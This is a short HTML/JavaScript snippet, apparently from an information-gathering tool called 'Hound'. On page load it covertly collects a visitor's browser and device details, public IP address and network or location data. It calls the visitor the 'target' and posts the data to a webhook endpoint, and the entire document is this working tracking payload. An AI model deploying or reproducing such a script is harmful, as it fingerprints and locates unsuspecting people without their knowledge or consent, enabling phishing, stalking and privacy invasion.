<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
  var x = document.getElementById("techchip");
  let datetime = new Date();
  let localtime = String(datetime.toLocaleTimeString());
  var targetinfo = ("Hound - Information Gathering Report\n------------------------------------\n\nDevice Information\n------------------------------------\nUser Agent: " + navigator.userAgent + "\nPlatform: " + navigator.platform + "\nCookies Enabled: " + navigator.cookieEnabled + "\nBrowser Language: " + navigator.language + "\nBrowser Name: " + navigator.appName + "\nBrowser CodeName: " + navigator.appCodeName + "\nRAM: " + navigator.deviceMemory + "\nCPU Cores: " + navigator.hardwareConcurrency + "\nScreen Width: " + screen.width + "\nScreen Height: " + screen.height + "\nLocal Time: " + localtime + "\nRefUrl: " + document.referrer + "\nOS CPU: " + navigator.oscpu + "\n------------------------------------\n");

  const xhr = new XMLHttpRequest();
      xhr.open("POST", "/webhook.php"); 
      xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
      xhr.send(JSON.stringify(targetinfo));
  $.getJSON("https://api.ipify.org?format=json", function(data) {
      $("#tc").html(data.ip);
      const xhr = new XMLHttpRequest();
          xhr.open("POST", "/webhook.php");
          xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
          var getip = ("\nTarget IP Detail\n----------------\nIP: " + data.ip + "\n----------------\n");
          xhr.send(JSON.stringify(getip));
  });
  $.getJSON("http://ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,proxy,hosting,query", function(response) {
      const xhr = new XMLHttpRequest();
          xhr.open("POST", "/webhook.php");
          xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
          var locationdata = ("\nNetwork & ISP Information\n--------------------------------\nResponse Status: " + response.status + "\n--------------------------------\n");
          xhr.send(JSON.stringify(locationdata));
  });
</script>
